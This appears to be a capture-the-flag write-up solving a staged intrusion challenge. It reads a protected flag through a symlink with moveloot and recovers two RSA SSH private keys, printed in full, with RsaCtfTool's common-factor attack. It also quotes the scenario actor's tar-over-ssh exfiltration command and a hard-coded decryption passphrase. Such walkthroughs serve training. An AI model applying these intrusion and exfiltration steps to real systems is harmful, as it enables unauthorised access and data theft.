-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0002.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0003.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0004.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0005.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0006.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
.....
-rwxrwxrwx    1 vault    users        33071 Feb 11 22:45 seq.00c2.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuh

Here we see the FLAG, the key/access token used by lootd to download files and all the encrypted exfiltrated data.
For reference the key used by lootd is the md5sum the word sandworm.

$ cat FLAG
                                           ╭──────────────────────────────────╮
             _ +s,                         │ 6bf3b4927c0dc259da32c033c8212449 │
             +:<nl:..:;;;.                 ╰───────────────────────────╮ FLAG │
        ._>=|||=+=;:;;;:-                                              ╰──────╯
   .__au2"==::|+++=:.::
 .%?X##c:;==+|==+=;;:::;:
 :lvX22n=+=|<i=+==;====;::           . .                       ._,,__.
  -+||||lIIYSSXos;:;;;;;:   _uqmmo .==;=;;;::::::::::::.   ._aamQQQQmmmwos.
           --~+Ivoi:-.- .<wmmWWWWC ==++========;:;:;::::.<qmWmZ!""!?9HQQQZo,
               -ivvnnaaadmmmWWWWQQa;++|||+|++==;;::----_wmmmmm;       -"4#mc
                -~+Ivnn2XZ#BWWWWWWmWo=+++|++==- ._aaamQQBm##Z#ma,.::..   )XX;
                    ~"InoXU##?!?$m#ZX;==+==;-.swQQQWWWWmm#ZZZU#mQm,     .%XX>
                   .  :vnoXZ'   -3UZXc.----.umWWWWWWBm##ZZXXXZ#mWWQwsssuZXSS(
                    . .ivnXX,    -XZXXos_aammmmmmmm##ZZXXXSSXZ#mWmW###Z#ZXoS`
                       -<IvXXa.  )#ZZXXX#XZZZ#Z#ZZXXXS22onnoXZmmBmm###ZZXe{2
                         <ivnXmuq#ZZZXXX2S2S2SoSo22oonnnvIvnoSX#UUZZZZZX2`)e
                          +iv2X###UXYIvIvvvIIvIvvvvvvIli||||In2SSSXXXZZX( =e
                            -nXU##Xl+|i=--~~++++|+||illvvvIvIiIIno2SSXZXz =|
                             =n##UX>=iii.           -+vvvvvnvnvilIooSXZmmc.-
                             :dmWWm>|i|ii             -~ilvvvIIli|iInXZ##G>:.
                              {#W#2`~lvvv=             .|+-~|>+<|||=-{XSS2(;=;
                              =mZZ(   <nnn;                 --.ivi>-  <oXX;-==.
                             _wmB#(   <o2on;                 .voon=   <dmmc -:.
                           ._d##8S'  <non1>`               .<uoon}`  .3Z#We
                           =!*11~   :++||+                 :++{}`   _IY2n+
                                                             .      --- -

To decrypt the data and get the next flag we need to gain access to the cloud-hq-42 server.

loot the easy way

The easiest way to read this flag is to make a simple symlink and read the flag with moveloot!

$ ln -s /vault/loot/FLAG .
$ /usr/sbin/moveloot -f FLAG
                                           ╭──────────────────────────────────╮
             _ +s,                         │ 6bf3b4927c0dc259da32c033c8212449 │
             +:<nl:..:;;;.                 ╰───────────────────────────╮ FLAG │
        ._>=|||=+=;:;;;:-                                              ╰──────╯
   .__au2"==::|+++=:.::
 .%?X##c:;==+|==+=;;:::;:
 :lvX22n=+=|<i=+==;====;::           . .                       ._,,__.
  -+||||lIIYSSXos;:;;;;;:   _uqmmo .==;=;;;::::::::::::.   ._aamQQQQmmmwos.
           --~+Ivoi:-.- .<wmmWWWWC ==++========;:;:;::::.<qmWmZ!""!?9HQQQZo,
               -ivvnnaaadmmmWWWWQQa;++|||+|++==;;::----_wmmmmm;       -"4#mc
                -~+Ivnn2XZ#BWWWWWWmWo=+++|++==- ._aaamQQBm##Z#ma,.::..   )XX;
                    ~"InoXU##?!?$m#ZX;==+==;-.swQQQWWWWmm#ZZZU#mQm,     .%XX>
                   .  :vnoXZ'   -3UZXc.----.umWWWWWWBm##ZZXXXZ#mWWQwsssuZXSS(
                    . .ivnXX,    -XZXXos_aammmmmmmm##ZZXXXSSXZ#mWmW###Z#ZXoS`
                       -<IvXXa.  )#ZZXXX#XZZZ#Z#ZZXXXS22onnoXZmmBmm###ZZXe{2
                         <ivnXmuq#ZZZXXX2S2S2SoSo22oonnnvIvnoSX#UUZZZZZX2`)e
                          +iv2X###UXYIvIvvvIIvIvvvvvvIli||||In2SSSXXXZZX( =e
                            -nXU##Xl+|i=--~~++++|+||illvvvIvIiIIno2SSXZXz =|
                             =n##UX>=iii.           -+vvvvvnvnvilIooSXZmmc.-
                             :dmWWm>|i|ii             -~ilvvvIIli|iInXZ##G>:.
                              {#W#2`~lvvv=             .|+-~|>+<|||=-{XSS2(;=;
                              =mZZ(   <nnn;                 --.ivi>-  <oXX;-==.
                             _wmB#(   <o2on;                 .voon=   <dmmc -:.
                           ._d##8S'  <non1>`               .<uoon}`  .3Z#We
                           =!*11~   :++||+                 :++{}`   _IY2n+
                                                             .      --- -

This won’t however help you to actually access the loot, since you cannot guess all the encrypted filenames in /vault/loot.

cloud-hq-42

We have only seen this server referenced in the .ash_history of the vault user on the cloud-c2-70 server:

tar cz /vault/loot | ssh -i id oper@cloud-hq-42 lootimport

This server is reachable from the login server by ssh, but we do need the oper account’s SSH keys to be able to log on to it. Luckily for us this network is really insecure, and the ssh public keys we have access to from the keyserver are fundamentally flawed.

In addition we have access to one more SSH public key from the cloud-c2-70 server in /tmp/xxx as the threat actor fails to delete this.

Looking back at the list of SSH keys you will notice two EdDSA keys which stands out. Based on the key comment we can infer that the keys belong to Arjen K. Lenstra and Nadia Heninger. Doing some quick search on these two you can end up on Seth David Coen’s page on Understanding Common Factor Attacks: An RSA-Cracking Puzzle. This page talks about a weakness in RSA keys where the RSA private key can be infered if you have several public keys which share a prime.

In our case we have two keys, the one from /tmp/xxx and the one labled oper@cloud-hq-42, for the oper user sharing a prime, which lets us compute the private key.

I used RsaCtfTool to do the actual attack and key generation for me.

First I converted the ssh public keys to proper RSA public keys:

$ ssh-keygen -e -mpem -f xxx > xxx.pem
$ ssh-keygen -e -mpem -f oper@cloud-hq-42 > oper@cloud-hq-42.pem

Then I could use RsaCtfTool to do the actual attack:

$ RsaCtfTool.py --publickey "keys/*.pem" --private --verbose
[*] Multikey mode using keys: ['keys/xxx.pem', 'keys/oper@cloud-hq-42.pem']
[*] Found common factor in modulus for keys/xxx.pem and keys/oper@cloud-hq-42.pem
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAxed9N/gIMAhQhvntk8gdwnDZvqj8K3ZB88K56i61gt/tk24l
wYVh/5hglcCfR5hXGF6GDbzT/XN7Ol8mSOKLYsJ+1xslFtWnUdofPfhMTaWDCV+B
EGij4B0nvb5LtiJM8b01LrdpsQmVczOq+1PSKx5kLfnXoHsY3dAxrxfgBYzqnxCT
/IVg3Wc2Xnt0CT1gsCYuuSNdePEs/8tdDkXVsFRoWJfVrINtIlzPpv+MQXyIZAhI
iN1AsGEBby6F4PpPS+KIKx2gKF/fxazYtR8LYThkq/4fPU8j9yswDd/41Esy5Jdw
LRDcw3tsbV8jDHd6lx6MWrdpNRXqT4/Eu+KCKQIDAQABAoIBAQCp9B9j5jxZy3ok
QBPXup5b8f/8rTBJvrfqt0pjoxM7vkRPPONtqrc7AcfIMvBWUqxRADPNLmE7ImYr
/bRqGSssd+znm6chUf/r2g7EcCxO7hl2/i5fQg2hlEghuX9ZfWFopF08rkQ0xg8z
LKbkSNqPLv1HQmz7o1r6eiWAwVcgS5yWj1jgUAcY0YRHeIuhPBsnDQ80iWIaCbXJ
78qvFoFmNQM5dWs/DquHRPQSOXVsquL/Ah2iaIm97DKAjxgH2/ScKQrKopK0jh6c
SBsxvGX54DRH6rUrN0IUVYsfbOpVg/N4cVkPJApZ7Gio5LnHNOLiNaimU6kSY4Zl
nKlZEcbRAoGBAM0QhjbyGaB/UuT4KHPxgjb5Kra47cpocmMKc5TbxvaUV7ANT+LA
XHJDeVWV1tNkMbXshugauMzf4gzFAKr7DwN9EIJf06Hj19ABN8yECrgMoxqGc8wL
DE81ENQo1QO0qR03ZbMRIvJ3CiKWAyMC/XBcK6KdJq1IsRWJvjrhHBsFAoGBAPcP
qXlSKEoKcijnTiRZwoVVASBE6KHF0AXxQpnUToksgX8J5FX4gIoQx7AXCbrCt8kV
YeNo0wSfKFEHovceLSO78f2NsdmXewrwhCto1V/HV/gcrNbjS5vJ7s3S4CEC1tSS
ETbCYWprV6CKcyduyzpDWivrDyD+QOcW3qzP1JvVAoGBAI9Sxkuu6ERp2RkZbMSk
fntHqRfuppw6ZgBc9K2M8kGzKppso3H7OmHOUQaFZJF4zNm3CA8/ZfwjWk3MfwwB
ztuEVL6alULoCRVjVImHnCpJAtJuOI7bBe5yS2HNbBxb73rxFg6SopdOpfHIYUbe
Nx6J/SF5ruecD9Da5e8nGMq1AoGAQxwkAuqIOyR/QhEirskbB7DBb4yITHk5OoQA
fVyoQKawPlvnhFrOP7KzK2f2op6F4b9HKcitmVHKV8hlQg8WX+CLqT42E08Mgzo2
DLybSTsS8DiJ0o1HWngNwCcJ7q2gwXkz59YBNDEYSmmRQiLcXWUyNz/QijvGUX9q
2TJTJEkCgYEAx6jF8v2oE/+xTJVncHscrLcVrHq7ggNoUQTvirPyKo3JT8EfxTjl
/ut7d8LN9O9kDAOnNsS8XKlNDUeQgzuukWBi8DsT/iqRuyxiYs6IaHKDNb2EYDeA
XGwoQ0quu5hhrtuBTDitb1obxbyhS6e4fd1BQA58AHtYcGQ8R8jfPao=
-----END RSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAo1zFD9UAFfsiQT4XR8uzXW1/R8Mn0c4ZlxeB4gQsaSW0Z3rZ
zrWbNUxg8DqbZOtQHQTTQMKB3O5J0beKfjGIgcfRVawMarv/oT5+a5SliSgf8Ard
uO28ek4Syi0YNa9sLUnfakF+3FweHdzmZcvtQN1nRqKKFhAhSQYRxXJ742fCsZYz
txXwpH3vc+r0Dm/kn/6xPcmKz4dXqEYPXdmKcBGPuLiUeeghXhACPywyE21epmw8
IfMZea7rvDErPbXbtdB1ooZggGcrwk+BXCAPqv6/2tfGqHcFKsVTQGF9BktjKCyb
qkWNWPbOqpsbwsjo+JDOetJGs/NJ7lC0vpJLjwIDAQABAoIBAQCc2qBkGTJh6KX1
WvbjetUX6eECOIHtUyUDDBErwLIbq5ZSnYSwk3MZc+LIBp3aAo8DrfRhA+HJDgtX
EBIsJMdbRU7cIbwyZ5yFaAnepfVjgmFYDDbkL3B/RqOH+FB8i5kkyv93eLekQdaw
+b9HEs0VMQDOs5Y+pPIwuWEq4kfOCfQRjEiWOtK7tWfCXezMJlOO1BpBGh5MgzCH
PIC67OtdLYf0/eqxmr2+j9kdc8j9uReoHLPmeMr1jfXh+Vi2jO0lGJq+i6MbUNX0
CQtScWwC2hw9WSt8QEtb0z5KRoY1dG9SbclsHqHFpIzU/9+c85kIz24Suuk64TVL
oINGJf5xAoGBAM0QhjbyGaB/UuT4KHPxgjb5Kra47cpocmMKc5TbxvaUV7ANT+LA
XHJDeVWV1tNkMbXshugauMzf4gzFAKr7DwN9EIJf06Hj19ABN8yECrgMoxqGc8wL
DE81ENQo1QO0qR03ZbMRIvJ3CiKWAyMC/XBcK6KdJq1IsRWJvjrhHBsFAoGBAMvw
hcFQTUafjrMQu6UNduTm+ENeYRI8yDUa4Gqk6BIzvlgc10unYQjvIgnYDtcsIwIF
EV8MaGthQXY1N6qgtBeWxtWbNs9o3mhrWH3/a6cgtHOkWcnjNHEPHwUDZjrtj1gt
3JOpRQwkXb5n4FwoeYDw6mt+NVnhryb46QVQiBiDAoGBAI9Sxkuu6ERp2RkZbMSk
fntHqRfuppw6ZgBc9K2M8kGzKppso3H7OmHOUQaFZJF4zNm3CA8/ZfwjWk3MfwwB
ztuEVL6alULoCRVjVImHnCpJAtJuOI7bBe5yS2HNbBxb73rxFg6SopdOpfHIYUbe
Nx6J/SF5ruecD9Da5e8nGMq1AoGBALPzU9Kz7Lv4Zo4SocCOFO797upjCPxyraZO
RN9VC4GkLrzJFiAnXTPo7fwJrW6n/2v01NMtu6Wkd4K6ipgAnWiDHoe1IbP6MOWq
crca/f7GmPPBfYjq9occdJ6T1U0B+Y4xSYTxw39nR2CPgCVRgYUJD5AyGRlqTobw
84xA9xXJAoGART3eXjWmU5YsHeUOzY/hWlRVfixQPWG3L7KcuiykkKkVIK7KJdP9
5KF/geSprzLfdQMU2dOTlip8WKdIk8CNy7D6Z1v+jKCq0M0qaXm/DBfhSLJLliXY
tHIyh/6d+Kg59esRAmHXb2wgKRkKku1eXKBPV2/cI5P5c1hmAUYmCvs=
-----END RSA PRIVATE KEY-----

The output order of the keys may vary, so try them both. One of them should give access to oper’s account on cloud-hq-42:

$ ssh oper@cloud-hq-42 -i id
╔═══╗─────────────╔╗───╔╗───╔╗
║╔═╗║────────────╔╝╚╗──║║──╔╝╚╗
║║─╚╬══╦═╗╔══╦═╦═╩╗╔╬╗╔╣║╔═╩╗╔╬╦══╦═╗╔══╗
║║─╔╣╔╗║╔╗╣╔╗║╔╣╔╗║║║║║║║║╔╗║║╠╣╔╗║╔╗╣══╣
║╚═╝║╚╝║║║║╚╝║║║╔╗║╚╣╚╝║╚╣╔╗║╚╣║╚╝║║║╠══║
╚═══╩══╩╝╚╩═╗╠╝╚╝╚╩═╩══╩═╩╝╚╩═╩╩══╩╝╚╩══╝
──────────╔═╝║             Great success!
──────────╚══╝
oper@hq ~ > cat FLAG

                              .__s_a%Ivoawwaaaa,______.
                      .__vnowwpmQmmmmmQQQQW#YWW#QQQmZXXoi,.
                ._%sumZsaqmQmc)VUBWWWBHWWP!:sammmQQWWXmWQmga;_
             __wqm##Z?#mWQQWV\awmWQWQgc:-<wQQQQQQWP=sagQWWQQmmga,.
          .ad#UY?nawwaa}?V?<mQQQQQQQQQW=yQQQQQQQUmmQQQQQWQQQQQQQmq,
        _aoe+-<wQQQQWQQQo:aQQQQQQQQQQQ&QQQQQQQWmmWQQQQQQQQQQWQQWQQm,.
      .vmWQB=yQQWWWWWQQQtjQQQQQQQQQQQWmQQQQQQWmQWQQQQZVWWW#YWWQQQQQEna,
    .sa!{WWsmQQQW>:uWWQEvQQQQBmQQQQQWXWQQQQQWXQQQQQQQ#=:<a%=)Y$QQQQ#dWmw,
   .uZ2=mWGdWWWWE<mWQQQoQWQQBSWWQQQW#mWQQWWW#XWQQQWWEomQQQQQQmwdUWQQQQWWma,
   <oXomW#nBWmW#(dWWQQDdQQQWCdWWWWQWXmWQWWWWCdQWQWWmmQQQQQQQQQQmX$QQWW#$Wmm,
  _uXnmmW2dmmm#e<#BWWWXWWWW#{mmWWWW#2WWWQW#ZmWWWWBmmWWQWWWB#QQQWX#QQQQ#3$m#c
 .31nmZ#Z+XZ##Z(]#BWBmXmWmmk<#mmBm#e<X###SXmWmBmmmWWWWWW##Y{XUVY=3QWW#(=umqo, 
 :<dXS22+:SXXZX(3##mmmZmWm#e=XmWmBmmmmwo+)##mBBBmBm##ZXY!vw###mqwwXX"+<XBmm#n;
.=nX22ouoaoXXXS+{###m#####X>:X##mWmmm###m/*XXXXXSY111!`<uZZ#Z#ZmWmWmmms%X###Xs.
=>{2SSXZZZXS2So>+XXU#######X:)1X#ZU#ZXXY}~ ---:;:;=;: _X#UXXXXXXX##mm##X%3#ZZXs
 -:I1oSSSS2S2Son:<XXXZXX2XS1;-=+{(*+}++-:_saawmmqmmmmmw###ZZX2=vXZXZZ#ZX(+nXXXo
 _ :+||{lI11nnnn>:+{**||++--   ----._iawmWmmWmm#ZZ####mm##ZZZ(:{XXXXXXZXs=uS22o
:I|. ----:++illIi:.  -  ._saaas,._ummWBWmBmmm##XXSSSXZZZZZXY|: -|1S2XSSSe|nXo2l
 =:..===;:.:.-~++:.  _aqmmWBWmBWpmmWm###ZZZZZZ2~--++|!!*|"-=saua==+|{o2ol<non>:
   .||=::;=;::.    =w######XX##m###UZ#2+!*S11*:=aowa%,-  .idX#mmmo,:nXX2n;<nns.
    ++=;   ::::. .uS2XXXXXS>{XXXXS1*!+=sssi>==vSXXXSSXos.=voSSXXXZXsIo2onv=il|.
     -=|=;.. .   %vII111*+:..::;:--=<vXXn222o2nnnnnnooSos|vnnnvvnn2nivnvvvli>:
         ---:-. =vvvi;:_<%uS2ooooovnnnnl><vvnnvvI}innnnnvivnvvlivvvn>ivlvli>:-
             .  =i|il|%vnvvvvvnnnvvvvI>~..:=~+~---=<iiiii|illl>;<vvn>=iili+.
               -:::=|llIlIvi.----=--:.=ivl|=;:.     ---::==++=-:<lIvII|:--..
                 .:::=+|||i|==vlvii==||+---               - -  .::+=++~.. -
                    ..:-:::::++-:-:--           :_<vss_i_,       .
                            .                ._|innnno22nnvi|__..
                                .        . ..:|vvoooooonnnvvili+++=
                                - .      ...:=ivnonnnvvvvvvvvvvvi:
╭──────╮                                   ...=|ivvvIIlIlliiii||`
│ FLAG ╰───────────────────────────╮           ---+~+++=-=-=--
│ c7e94612d1ded34c709e23a496ac01c0 │                      .
╰─────────

As seen in the .ash_history on cloud-c2-70 the threat actor ran the command

tar cz /vault/loot | ssh -i id oper@cloud-hq-42 lootimport

to exfiltrate data to this server. Taking a look at /bin/lootimport we can see that it decrypts the encrypted data and we can see the key they are using:

#!/bin/sh
set -ex
d=$(mktemp -d)
tar xz -C $d
#find $d -type f | xargs -n1 cat | crypt0r "precise stallion cell nail" | less

If we copy out /bin/crypt0r we can use it to decrypt the files from /vault/loot on cloud-c2-70. The decryption gives us the NIS’ unclassified yearly threat report, FOKUS 2020 and the flag for the last mission.

$ cat seq.0000.zavzlqdyoakhcdqzacqdiamtytleoljooepzwuzlwluyokxppnsxpgqobbuppdfd.decrypt
FLAG: 147597090536facfc0873b6e567699ba
$ cat seq*zeicfg*.decrypt >> focus2020.pdf
$ md5sum focus2020.pdf
8728fe7f83d1b0a702b54265081604f0  focus2020.pdf

Fokus 2020

This concludes the mission task, and only the Brainteaser is left.